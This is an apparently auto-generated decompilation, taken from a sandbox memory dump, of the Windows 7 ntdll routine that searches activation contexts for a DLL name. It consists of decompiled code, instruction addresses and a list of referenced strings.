                                                                                                                                                    			E00C6F3CF(signed short* __ecx, signed short __edx, signed short* __esi, char _a4, signed int _a8) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				short _v12;
                                                                                                                                                    				short _v24;
                                                                                                                                                    				intOrPtr _v28;
                                                                                                                                                    				short* _v32;
                                                                                                                                                    				short* _v36;
                                                                                                                                                    				short* _v40;
                                                                                                                                                    				short _v42;
                                                                                                                                                    				signed int _v44;
                                                                                                                                                    				signed int _v48;
                                                                                                                                                    				signed int _v52;
                                                                                                                                                    				signed short _v56;
                                                                                                                                                    				signed int _v60;
                                                                                                                                                    				signed short _v64;
                                                                                                                                                    				signed int _v68;
                                                                                                                                                    				signed int _v72;
                                                                                                                                                    				signed int _v76;
                                                                                                                                                    				signed int _v80;
                                                                                                                                                    				signed char* _v84;
                                                                                                                                                    				signed int _v88;
                                                                                                                                                    				char _v92;
                                                                                                                                                    				signed int _v116;
                                                                                                                                                    				intOrPtr _v120;
                                                                                                                                                    				intOrPtr _v124;
                                                                                                                                                    				intOrPtr _v128;
                                                                                                                                                    				intOrPtr _v132;
                                                                                                                                                    				intOrPtr _v144;
                                                                                                                                                    				intOrPtr _v148;
                                                                                                                                                    				char _v152;
                                                                                                                                                    				char _v156;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __ebp;
                                                                                                                                                    				signed int _t186;
                                                                                                                                                    				short _t194;
                                                                                                                                                    				short* _t196;
                                                                                                                                                    				intOrPtr _t205;
                                                                                                                                                    				signed char* _t206;
                                                                                                                                                    				signed char _t207;
                                                                                                                                                    				signed int _t209;
                                                                                                                                                    				signed short* _t210;
                                                                                                                                                    				void* _t214;
                                                                                                                                                    				signed int _t215;
                                                                                                                                                    				signed int _t219;
                                                                                                                                                    				void* _t221;
                                                                                                                                                    				signed int _t223;
                                                                                                                                                    				signed short _t227;
                                                                                                                                                    				signed char _t232;
                                                                                                                                                    				void* _t237;
                                                                                                                                                    				signed int _t238;
                                                                                                                                                    				signed short _t242;
                                                                                                                                                    				signed int _t245;
                                                                                                                                                    				signed int _t254;
                                                                                                                                                    				void* _t255;
                                                                                                                                                    				signed int _t256;
                                                                                                                                                    				signed short _t260;
                                                                                                                                                    				void* _t266;
                                                                                                                                                    				signed int _t267;
                                                                                                                                                    				signed int _t271;
                                                                                                                                                    				signed short* _t282;
                                                                                                                                                    				signed int _t283;
                                                                                                                                                    				signed int _t287;
                                                                                                                                                    				signed int _t288;
                                                                                                                                                    				signed int _t291;
                                                                                                                                                    				intOrPtr* _t296;
                                                                                                                                                    				intOrPtr _t297;
                                                                                                                                                    				signed int _t299;
                                                                                                                                                    				signed int* _t300;
                                                                                                                                                    				signed short _t304;
                                                                                                                                                    				char* _t337;
                                                                                                                                                    				signed int* _t342;
                                                                                                                                                    				signed int _t345;
                                                                                                                                                    				signed short* _t347;
                                                                                                                                                    				signed int _t348;
                                                                                                                                                    				void* _t349;
                                                                                                                                                    				void* _t350;
                                                                                                                                                    
                                                                                                                                                    				_t347 = __esi;
                                                                                                                                                    				_t186 =  *0xd42088; // 0x777dc194
                                                                                                                                                    				_v8 = _t186 ^ _t348;
                                                                                                                                                    				_v88 = _a8;
                                                                                                                                                    				_t345 = __edx;
                                                                                                                                                    				_t282 = __ecx;
                                                                                                                                                    				_v56 = __edx;
                                                                                                                                                    				_v156 = 0x40;
                                                                                                                                                    				L00C6DFC0( &_v152, 0, 0x3c);
                                                                                                                                                    				_t350 = _t349 + 0xc;
                                                                                                                                                    				_v68 =  *_t282;
                                                                                                                                                    				_v64 = _t282[2];
                                                                                                                                                    				_t337 =  &_v12;
                                                                                                                                                    				_v32 = _t337;
                                                                                                                                                    				_v40 = _t337;
                                                                                                                                                    				_v36 =  &_v12;
                                                                                                                                                    				_t194 = 2;
                                                                                                                                                    				_v12 = 0;
                                                                                                                                                    				_v44 = 0;
                                                                                                                                                    				_v42 = _t194;
                                                                                                                                                    				_t341 =  &_v68;
                                                                                                                                                    				_v72 = 0;
                                                                                                                                                    				_v60 = 0;
                                                                                                                                                    				_v28 = _t194;
                                                                                                                                                    				_v24 = _t194;
                                                                                                                                                    				_t283 = L00C6ED18(3, 0, _t194,  &_v68,  &_v156);
                                                                                                                                                    				if(_t283 >= 0) {
                                                                                                                                                    					__eflags = _a4;
                                                                                                                                                    					if(_a4 != 0) {
                                                                                                                                                    						L44:
                                                                                                                                                    						_t283 = 0;
                                                                                                                                                    						L2:
                                                                                                                                                    						_t291 = _v36;
                                                                                                                                                    						_t196 = _v32;
                                                                                                                                                    						if(_t291 != 0) {
                                                                                                                                                    							if(_t291 != _t196) {
                                                                                                                                                    								_v88 = _t291;
                                                                                                                                                    								E00C6E1C6( &_v92);
                                                                                                                                                    								_t196 = _v32;
                                                                                                                                                    							}
                                                                                                                                                    							_v36 = _t196;
                                                                                                                                                    							_v28 = _v24;
                                                                                                                                                    						}
                                                                                                                                                    						_v40 = _t196;
                                                                                                                                                    						if(_t196 != 0) {
                                                                                                                                                    							 *_t196 = 0;
                                                                                                                                                    						}
                                                                                                                                                    						_v44 = 0;
                                                                                                                                                    						_t198 = _v24;
                                                                                                                                                    						_v42 = _v24;
                                                                                                                                                    						if(_v72 != 0) {
                                                                                                                                                    							L00C7B90D(_t198, _v72);
                                                                                                                                                    						}
                                                                                                                                                    						return E00C6E1B4(_t283, _t283, _v8 ^ _t348, _t341, _t345, _t347);
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _v144 - 0x14;
                                                                                                                                                    					_v72 = _v124;
                                                                                                                                                    					if(_v144 < 0x14) {
                                                                                                                                                    						L48:
                                                                                                                                                    						_t283 = 0xc0150003;
                                                                                                                                                    						goto L2;
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _v152 - 1;
                                                                                                                                                    					if(_v152 != 1) {
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					_t205 = _v148;
                                                                                                                                                    					_t296 = _t205 + 0x10;
                                                                                                                                                    					_v52 = _t296;
                                                                                                                                                    					_t297 =  *_t296;
                                                                                                                                                    					__eflags = _t297 - _v128;
                                                                                                                                                    					if(_t297 > _v128) {
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					_t342 = _t205 + 0xc;
                                                                                                                                                    					_v76 = _t342;
                                                                                                                                                    					_t341 =  *_t342;
                                                                                                                                                    					__eflags = _t341 - 0x1fffffff;
                                                                                                                                                    					if(_t341 > 0x1fffffff) {
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					_t341 = _t341 << 3;
                                                                                                                                                    					__eflags = _t297 - (_t283 | 0xffffffff) - _t341;
                                                                                                                                                    					if(_t297 > (_t283 | 0xffffffff) - _t341) {
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					_t341 = _t341 + _t297;
                                                                                                                                                    					__eflags = _t341 - _v128;
                                                                                                                                                    					if(_t341 > _v128) {
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					_t206 = _t205 + 4;
                                                                                                                                                    					_v84 = _t206;
                                                                                                                                                    					_t207 =  *_t206;
                                                                                                                                                    					__eflags = _t207 & 0x00000002;
                                                                                                                                                    					if((_t207 & 0x00000002) == 0) {
                                                                                                                                                    						L22:
                                                                                                                                                    						_t287 =  *_v52 + _v132;
                                                                                                                                                    						_t209 = 0;
                                                                                                                                                    						 *_t345 = 0;
                                                                                                                                                    						_t299 =  *_v76;
                                                                                                                                                    						_v52 = _t299;
                                                                                                                                                    						__eflags = _t299;
                                                                                                                                                    						while(1) {
                                                                                                                                                    							_v48 = _t209;
                                                                                                                                                    							if(__eflags == 0) {
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							_t300 = _t287 + 4 + _t209 * 8;
                                                                                                                                                    							_t341 =  *_t300;
                                                                                                                                                    							_v76 = _t341;
                                                                                                                                                    							__eflags = _t341 - _v128;
                                                                                                                                                    							if(_t341 > _v128) {
                                                                                                                                                    								goto L48;
                                                                                                                                                    							}
                                                                                                                                                    							_t210 = _t287 + _t209 * 8;
                                                                                                                                                    							_t341 = (_t341 | 0xffffffff) -  *_t210;
                                                                                                                                                    							__eflags =  *_t300 - _t341;
                                                                                                                                                    							if( *_t300 > _t341) {
                                                                                                                                                    								goto L48;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags =  *_t210 + _v76 - _v128;
                                                                                                                                                    							if( *_t210 + _v76 > _v128) {
                                                                                                                                                    								goto L48;
                                                                                                                                                    							}
                                                                                                                                                    							 *_t345 =  *_t345 + ( *_t210 & 0x0000ffff);
                                                                                                                                                    							_t209 = _v48 + 1;
                                                                                                                                                    							__eflags = _t209 - _v52;
                                                                                                                                                    						}
                                                                                                                                                    						_t303 = _v60;
                                                                                                                                                    						__eflags = _t303;
                                                                                                                                                    						if(_t303 != 0) {
                                                                                                                                                    							 *_t345 =  *_t345 + ( *_t303 & 0x0000ffff);
                                                                                                                                                    							__eflags =  *_t345;
                                                                                                                                                    						}
                                                                                                                                                    						_t214 = ( *_t345 & 0x0000ffff) + 2;
                                                                                                                                                    						__eflags = _t214 - 0xfffe;
                                                                                                                                                    						if(_t214 > 0xfffe) {
                                                                                                                                                    							L76:
                                                                                                                                                    							_t283 = 0xc0000106;
                                                                                                                                                    							goto L2;
                                                                                                                                                    						} else {
                                                                                                                                                    							_t345 =  &(_t347[4]);
                                                                                                                                                    							__eflags = _t345;
                                                                                                                                                    							if(_t345 == 0) {
                                                                                                                                                    								L60:
                                                                                                                                                    								_t215 = E00C978E5(0, _t345, _t214);
                                                                                                                                                    								__eflags = _t215;
                                                                                                                                                    								if(_t215 >= 0) {
                                                                                                                                                    									_t303 = _v60;
                                                                                                                                                    									L29:
                                                                                                                                                    									_t347[2] =  *_t345;
                                                                                                                                                    									_t347[1] = _t347[8];
                                                                                                                                                    									__eflags = _t303;
                                                                                                                                                    									if(_t303 == 0) {
                                                                                                                                                    										L34:
                                                                                                                                                    										_v48 = _v48 & 0x00000000;
                                                                                                                                                    										__eflags = _v52;
                                                                                                                                                    										if(_v52 != 0) {
                                                                                                                                                    											while(1) {
                                                                                                                                                    												_t219 = _v48 << 3;
                                                                                                                                                    												_t304 =  *((intOrPtr*)(_t219 + _t287));
                                                                                                                                                    												_t345 =  *((intOrPtr*)(_t219 + _t287 + 4)) + _v132;
                                                                                                                                                    												_v80 = _t304;
                                                                                                                                                    												_t221 = ( *_t347 & 0x0000ffff) + (_t304 & 0x0000ffff) + 2;
                                                                                                                                                    												__eflags = _t221 - 0xfffe;
                                                                                                                                                    												if(_t221 > 0xfffe) {
                                                                                                                                                    													goto L76;
                                                                                                                                                    												}
                                                                                                                                                    												__eflags =  &(_t347[4]);
                                                                                                                                                    												if( &(_t347[4]) == 0) {
                                                                                                                                                    													L68:
                                                                                                                                                    													_t223 = E00C978E5(0,  &(_t347[4]), _t221);
                                                                                                                                                    													__eflags = _t223;
                                                                                                                                                    													if(_t223 < 0) {
                                                                                                                                                    														goto L61;
                                                                                                                                                    													}
                                                                                                                                                    													L69:
                                                                                                                                                    													_t347[2] = _t347[4];
                                                                                                                                                    													E00C78980(_t347[4] + (( *_t347 & 0x0000ffff) >> 1) * 2, _t345, _v80 & 0x0000ffff);
                                                                                                                                                    													_t227 = _v80;
                                                                                                                                                    													 *_t347 =  *_t347 + _t227;
                                                                                                                                                    													_t347[1] =  *_t347 + _t227 + 2;
                                                                                                                                                    													_t303 = _t347[2];
                                                                                                                                                    													_t341 = 0;
                                                                                                                                                    													_t350 = _t350 + 0xc;
                                                                                                                                                    													_v48 = _v48 + 1;
                                                                                                                                                    													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                    													__eflags = _v48 - _v52;
                                                                                                                                                    													if(_v48 == _v52) {
                                                                                                                                                    														goto L35;
                                                                                                                                                    													}
                                                                                                                                                    													continue;
                                                                                                                                                    												}
                                                                                                                                                    												__eflags = _t221 - _t347[8];
                                                                                                                                                    												if(_t221 <= _t347[8]) {
                                                                                                                                                    													goto L69;
                                                                                                                                                    												}
                                                                                                                                                    												goto L68;
                                                                                                                                                    											}
                                                                                                                                                    											goto L76;
                                                                                                                                                    										}
                                                                                                                                                    										L35:
                                                                                                                                                    										_t232 =  *_v84;
                                                                                                                                                    										_t345 = _v56;
                                                                                                                                                    										__eflags = _t232 & 0x00000001;
                                                                                                                                                    										if((_t232 & 0x00000001) != 0) {
                                                                                                                                                    											L42:
                                                                                                                                                    											__eflags =  *_v84 & 0x00000004;
                                                                                                                                                    											if(__eflags != 0) {
                                                                                                                                                    												_push(0);
                                                                                                                                                    												_t341 = _t347;
                                                                                                                                                    												_t283 = E00CEC0DD(_t287,  &_v44, _t347, _t345, _t347, __eflags);
                                                                                                                                                    												__eflags = _t283;
                                                                                                                                                    												if(_t283 < 0) {
                                                                                                                                                    													goto L2;
                                                                                                                                                    												}
                                                                                                                                                    												 *_t347 = 0;
                                                                                                                                                    												_t237 = (_v44 & 0x0000ffff) + 2;
                                                                                                                                                    												__eflags = _t237 - 0xfffe;
                                                                                                                                                    												if(_t237 > 0xfffe) {
                                                                                                                                                    													goto L76;
                                                                                                                                                    												}
                                                                                                                                                    												_t288 =  &(_t347[4]);
                                                                                                                                                    												__eflags = _t288;
                                                                                                                                                    												if(_t288 == 0) {
                                                                                                                                                    													L83:
                                                                                                                                                    													_t238 = E00C978E5(0, _t288, _t237);
                                                                                                                                                    													__eflags = _t238;
                                                                                                                                                    													if(_t238 < 0) {
                                                                                                                                                    														goto L61;
                                                                                                                                                    													}
                                                                                                                                                    													L84:
                                                                                                                                                    													_t347[2] =  *_t288;
                                                                                                                                                    													E00C78980( *_t288 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v40, _v44 & 0x0000ffff);
                                                                                                                                                    													_t242 = _v44;
                                                                                                                                                    													 *_t347 =  *_t347 + _t242;
                                                                                                                                                    													_t347[1] =  *_t347 + _t242 + 2;
                                                                                                                                                    													_t341 = 0;
                                                                                                                                                    													 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                    													goto L43;
                                                                                                                                                    												}
                                                                                                                                                    												__eflags = _t237 - _t347[8];
                                                                                                                                                    												if(_t237 <= _t347[8]) {
                                                                                                                                                    													goto L84;
                                                                                                                                                    												}
                                                                                                                                                    												goto L83;
                                                                                                                                                    											}
                                                                                                                                                    											L43:
                                                                                                                                                    											_t245 = _v88;
                                                                                                                                                    											__eflags = _t245;
                                                                                                                                                    											if(_t245 != 0) {
                                                                                                                                                    												 *_t245 =  *_t245 | 0x00000002;
                                                                                                                                                    											}
                                                                                                                                                    											goto L44;
                                                                                                                                                    										}
                                                                                                                                                    										__eflags = _t232 & 0x00000008;
                                                                                                                                                    										if((_t232 & 0x00000008) != 0) {
                                                                                                                                                    											_t283 = L00C6FBD7(1,  &_v68, 0xc9b024,  &_v56);
                                                                                                                                                    											__eflags = _t283;
                                                                                                                                                    											if(_t283 >= 0) {
                                                                                                                                                    												_v68 = _v68 + 0xfffe - _v56;
                                                                                                                                                    												_v64 = _v64 + 2 + ((_v56 & 0x0000ffff) >> 1) * 2;
                                                                                                                                                    												goto L37;
                                                                                                                                                    											}
                                                                                                                                                    											__eflags = _t283 - 0xc0000225;
                                                                                                                                                    											if(_t283 != 0xc0000225) {
                                                                                                                                                    												goto L2;
                                                                                                                                                    											}
                                                                                                                                                    											_push("Status != STATUS_NOT_FOUND");
                                                                                                                                                    											_push(0x472);
                                                                                                                                                    											L74:
                                                                                                                                                    											_push("d:\\w7rtm\\minkernel\\ntdll\\sxsisol.cpp");
                                                                                                                                                    											_push("Internal error check failed");
                                                                                                                                                    											E00CF77A7(_t303, _t341);
                                                                                                                                                    											_t283 = 0xc00000e5;
                                                                                                                                                    											goto L2;
                                                                                                                                                    										}
                                                                                                                                                    										L37:
                                                                                                                                                    										_t254 = _v68 & 0x0000ffff;
                                                                                                                                                    										 *_t345 =  *_t345 + _t254;
                                                                                                                                                    										__eflags =  *_t345 - 0xffff;
                                                                                                                                                    										if( *_t345 >= 0xffff) {
                                                                                                                                                    											goto L76;
                                                                                                                                                    										}
                                                                                                                                                    										_t255 = ( *_t347 & 0x0000ffff) + _t254 + 2;
                                                                                                                                                    										__eflags = _t255 - 0xfffe;
                                                                                                                                                    										if(_t255 > 0xfffe) {
                                                                                                                                                    											goto L76;
                                                                                                                                                    										}
                                                                                                                                                    										_t287 =  &(_t347[4]);
                                                                                                                                                    										__eflags = _t287;
                                                                                                                                                    										if(_t287 == 0) {
                                                                                                                                                    											L77:
                                                                                                                                                    											_t256 = E00C978E5(0, _t287, _t255);
                                                                                                                                                    											__eflags = _t256;
                                                                                                                                                    											if(_t256 >= 0) {
                                                                                                                                                    												L41:
                                                                                                                                                    												_t347[2] =  *_t287;
                                                                                                                                                    												E00C78980( *_t287 + (( *_t347 & 0x0000ffff) >> 1) * 2, _v64, _v68 & 0x0000ffff);
                                                                                                                                                    												_t260 = _v68;
                                                                                                                                                    												 *_t347 =  *_t347 + _t260;
                                                                                                                                                    												_t347[1] =  *_t347 + _t260 + 2;
                                                                                                                                                    												_t350 = _t350 + 0xc;
                                                                                                                                                    												_t341 = 0;
                                                                                                                                                    												__eflags = 0;
                                                                                                                                                    												 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                    												goto L42;
                                                                                                                                                    											}
                                                                                                                                                    											goto L61;
                                                                                                                                                    										}
                                                                                                                                                    										__eflags = _t255 - _t347[8];
                                                                                                                                                    										if(_t255 > _t347[8]) {
                                                                                                                                                    											goto L77;
                                                                                                                                                    										}
                                                                                                                                                    										goto L41;
                                                                                                                                                    									}
                                                                                                                                                    									 *_t347 = 0;
                                                                                                                                                    									_t266 = ( *_t303 & 0x0000ffff) + 2;
                                                                                                                                                    									__eflags = _t266 - 0xfffe;
                                                                                                                                                    									if(_t266 > 0xfffe) {
                                                                                                                                                    										goto L76;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = _t345;
                                                                                                                                                    									if(_t345 == 0) {
                                                                                                                                                    										L63:
                                                                                                                                                    										_t267 = E00C978E5(0, _t345, _t266);
                                                                                                                                                    										__eflags = _t267;
                                                                                                                                                    										if(_t267 < 0) {
                                                                                                                                                    											goto L61;
                                                                                                                                                    										}
                                                                                                                                                    										_t303 = _v60;
                                                                                                                                                    										L33:
                                                                                                                                                    										_t347[2] =  *_t345;
                                                                                                                                                    										E00C78980( *_t345 + (( *_t347 & 0x0000ffff) >> 1) * 2,  *((intOrPtr*)(_t303 + 4)),  *_t303 & 0x0000ffff);
                                                                                                                                                    										_t271 = _v60;
                                                                                                                                                    										_t350 = _t350 + 0xc;
                                                                                                                                                    										_t347[1] =  *_t347 +  *_t271 + 2;
                                                                                                                                                    										 *_t347 =  *_t347 +  *_t271;
                                                                                                                                                    										_t303 = _t347[2];
                                                                                                                                                    										_t341 = 0;
                                                                                                                                                    										__eflags = 0;
                                                                                                                                                    										 *((short*)(_t347[2] + (( *_t347 & 0x0000ffff) >> 1) * 2)) = 0;
                                                                                                                                                    										goto L34;
                                                                                                                                                    									}
                                                                                                                                                    									__eflags = _t266 - _t347[8];
                                                                                                                                                    									if(_t266 > _t347[8]) {
                                                                                                                                                    										goto L63;
                                                                                                                                                    									}
                                                                                                                                                    									goto L33;
                                                                                                                                                    								}
                                                                                                                                                    								L61:
                                                                                                                                                    								_t283 = 0xc0000017;
                                                                                                                                                    								goto L2;
                                                                                                                                                    							}
                                                                                                                                                    							__eflags = _t214 - _t347[8];
                                                                                                                                                    							if(_t214 > _t347[8]) {
                                                                                                                                                    								goto L60;
                                                                                                                                                    							}
                                                                                                                                                    							goto L29;
                                                                                                                                                    						}
                                                                                                                                                    					}
                                                                                                                                                    					_t303 = 0;
                                                                                                                                                    					_v48 = 0;
                                                                                                                                                    					__eflags = _t207 & 0x00000004;
                                                                                                                                                    					if((_t207 & 0x00000004) != 0) {
                                                                                                                                                    						_push("sxsisol_SearchActCtxForDllName");
                                                                                                                                                    						_push( *((intOrPtr*)( *[fs:0x18] + 0x24)));
                                                                                                                                                    						L00CB3F92(0x33, 0, "[%x.%x] SXS: %s - Relative redirection plus env var expansion.\n",  *((intOrPtr*)( *[fs:0x18] + 0x20)));
                                                                                                                                                    						goto L48;
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _v116 & 0x00000001;
                                                                                                                                                    					if((_v116 & 0x00000001) != 0) {
                                                                                                                                                    						__eflags = _v116 & 0x00000002;
                                                                                                                                                    						if((_v116 & 0x00000002) != 0) {
                                                                                                                                                    							_push("!(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT)");
                                                                                                                                                    							_push(0x416);
                                                                                                                                                    							goto L74;
                                                                                                                                                    						}
                                                                                                                                                    						_t303 = 1;
                                                                                                                                                    					}
                                                                                                                                                    					__eflags = _v116 & 0x00000002;
                                                                                                                                                    					if((_v116 & 0x00000002) != 0) {
                                                                                                                                                    						_t303 = _t303 | 0x00000002;
                                                                                                                                                    					}
                                                                                                                                                    					_t283 = E00C8C507(_t303, _v124, _v120,  &_v60, 0xc8cdad,  &_v48);
                                                                                                                                                    					__eflags = _t283;
                                                                                                                                                    					if(_t283 < 0) {
                                                                                                                                                    						__eflags = _t283 - 0xc0000120;
                                                                                                                                                    						if(_t283 == 0xc0000120) {
                                                                                                                                                    							__eflags = _v48;
                                                                                                                                                    							if(_v48 < 0) {
                                                                                                                                                    								_t283 = _v48;
                                                                                                                                                    							}
                                                                                                                                                    						}
                                                                                                                                                    						goto L2;
                                                                                                                                                    					} else {
                                                                                                                                                    						goto L22;
                                                                                                                                                    					}
                                                                                                                                                    				}
                                                                                                                                                    				if(_t283 == 0xc0150001) {
                                                                                                                                                    					_t283 = _t283 + 7;
                                                                                                                                                    				}
                                                                                                                                                    				goto L2;
                                                                                                                                                    			}
                                                                                                                                                    0x00c8c37b
                                                                                                                                                    0x00c8c383
                                                                                                                                                    0x00c8c386
                                                                                                                                                    0x00c8c388
                                                                                                                                                    0x00c8c38a
                                                                                                                                                    0x00c8c38c
                                                                                                                                                    0x00c8c38f
                                                                                                                                                    0x00c8c391
                                                                                                                                                    0x00c8c391
                                                                                                                                                    0x00c8c394
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3c35
                                                                                                                                                    0x00cc3c39
                                                                                                                                                    0x00cc3c3b
                                                                                                                                                    0x00cc3c3e
                                                                                                                                                    0x00cc3c41
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3c4a
                                                                                                                                                    0x00cc3c4d
                                                                                                                                                    0x00cc3c4f
                                                                                                                                                    0x00cc3c51
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3c5c
                                                                                                                                                    0x00cc3c5f
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3c68
                                                                                                                                                    0x00cc3c6d
                                                                                                                                                    0x00cc3c6e
                                                                                                                                                    0x00cc3c6e
                                                                                                                                                    0x00c8c39a
                                                                                                                                                    0x00c8c39d
                                                                                                                                                    0x00c8c39f
                                                                                                                                                    0x00c8c3a4
                                                                                                                                                    0x00c8c3a4
                                                                                                                                                    0x00c8c3a4
                                                                                                                                                    0x00c8c3a9
                                                                                                                                                    0x00c8c3ac
                                                                                                                                                    0x00c8c3b1
                                                                                                                                                    0x00cc3dae
                                                                                                                                                    0x00cc3dae
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c3b7
                                                                                                                                                    0x00c8c3b7
                                                                                                                                                    0x00c8c3ba
                                                                                                                                                    0x00c8c3bc
                                                                                                                                                    0x00cc3c76
                                                                                                                                                    0x00cc3c7a
                                                                                                                                                    0x00cc3c7f
                                                                                                                                                    0x00cc3c81
                                                                                                                                                    0x00cc3c8d
                                                                                                                                                    0x00c8c3cb
                                                                                                                                                    0x00c8c3cd
                                                                                                                                                    0x00c8c3d4
                                                                                                                                                    0x00c8c3d8
                                                                                                                                                    0x00c8c3da
                                                                                                                                                    0x00c8c445
                                                                                                                                                    0x00c8c445
                                                                                                                                                    0x00c8c449
                                                                                                                                                    0x00c8c44d
                                                                                                                                                    0x00cc3caa
                                                                                                                                                    0x00cc3cad
                                                                                                                                                    0x00cc3cb0
                                                                                                                                                    0x00cc3cb8
                                                                                                                                                    0x00cc3cbe
                                                                                                                                                    0x00cc3cc5
                                                                                                                                                    0x00cc3cc9
                                                                                                                                                    0x00cc3cce
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3cd7
                                                                                                                                                    0x00cc3cd9
                                                                                                                                                    0x00cc3ce0
                                                                                                                                                    0x00cc3ce7
                                                                                                                                                    0x00cc3cec
                                                                                                                                                    0x00cc3cee
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3cf0
                                                                                                                                                    0x00cc3cfd
                                                                                                                                                    0x00cc3d05
                                                                                                                                                    0x00cc3d0d
                                                                                                                                                    0x00cc3d11
                                                                                                                                                    0x00cc3d20
                                                                                                                                                    0x00cc3d24
                                                                                                                                                    0x00cc3d27
                                                                                                                                                    0x00cc3d29
                                                                                                                                                    0x00cc3d2c
                                                                                                                                                    0x00cc3d2f
                                                                                                                                                    0x00cc3d36
                                                                                                                                                    0x00cc3d39
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3d3f
                                                                                                                                                    0x00cc3cdb
                                                                                                                                                    0x00cc3cde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3cde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3caa
                                                                                                                                                    0x00c8c453
                                                                                                                                                    0x00c8c456
                                                                                                                                                    0x00c8c458
                                                                                                                                                    0x00c8c45b
                                                                                                                                                    0x00c8c45d
                                                                                                                                                    0x00c8c4e4
                                                                                                                                                    0x00c8c4e7
                                                                                                                                                    0x00c8c4ea
                                                                                                                                                    0x00cc3dce
                                                                                                                                                    0x00cc3dd3
                                                                                                                                                    0x00cc3dda
                                                                                                                                                    0x00cc3ddc
                                                                                                                                                    0x00cc3dde
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3de6
                                                                                                                                                    0x00cc3ded
                                                                                                                                                    0x00cc3df0
                                                                                                                                                    0x00cc3df5
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3df7
                                                                                                                                                    0x00cc3dfa
                                                                                                                                                    0x00cc3dfc
                                                                                                                                                    0x00cc3e03
                                                                                                                                                    0x00cc3e07
                                                                                                                                                    0x00cc3e0c
                                                                                                                                                    0x00cc3e0e
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3e14
                                                                                                                                                    0x00cc3e23
                                                                                                                                                    0x00cc3e2a
                                                                                                                                                    0x00cc3e32
                                                                                                                                                    0x00cc3e36
                                                                                                                                                    0x00cc3e43
                                                                                                                                                    0x00cc3e4f
                                                                                                                                                    0x00cc3e51
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3e51
                                                                                                                                                    0x00cc3dfe
                                                                                                                                                    0x00cc3e01
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3e01
                                                                                                                                                    0x00c8c4f0
                                                                                                                                                    0x00c8c4f0
                                                                                                                                                    0x00c8c4f3
                                                                                                                                                    0x00c8c4f5
                                                                                                                                                    0x00cc3e5a
                                                                                                                                                    0x00cc3e5a
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00c8c4f5
                                                                                                                                                    0x00c8c463
                                                                                                                                                    0x00c8c465
                                                                                                                                                    0x00cc3d58
                                                                                                                                                    0x00cc3d5a
                                                                                                                                                    0x00cc3d5c
                                                                                                                                                    0x00cc3d98
                                                                                                                                                    0x00cc3da6
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3da6
                                                                                                                                                    0x00cc3d5e
                                                                                                                                                    0x00cc3d64
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00000000
                                                                                                                                                    0x00cc3d6a
                                                                                                                                                    0x00cc3d6f
                                                                                                                                                    0x00cc3d74

                                                                                                                                                    Strings
                                                                                                                                                    • Status != STATUS_NOT_FOUND, xrefs: 00CC3D6A
                                                                                                                                                    • d:\w7rtm\minkernel\ntdll\sxsisol.cpp, xrefs: 00CC3D74
                                                                                                                                                    • @, xrefs: 00C6F3FE
                                                                                                                                                    • sxsisol_SearchActCtxForDllName, xrefs: 00CC3BCE
                                                                                                                                                    • [%x.%x] SXS: %s - Relative redirection plus env var expansion., xrefs: 00CC3BDF
                                                                                                                                                    • !(askd.Flags & ACTIVATION_CONTEXT_SECTION_KEYED_DATA_FLAG_FOUND_IN_SYSTEM_DEFAULT), xrefs: 00CC3C08
                                                                                                                                                    • Internal error check failed, xrefs: 00CC3D79
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000006.00000002.2243415751.0000000000C50000.00000040.00000001.sdmp, Offset: 00C40000, based on PE: true
                                                                                                                                                    • Associated: 00000006.00000002.2243405937.0000000000C40000.00000040.00000001.sdmp
                                                                                                                                                    • Associated: 00000006.00000002.2243529525.0000000000D30000.00000040.00000001.sdmp
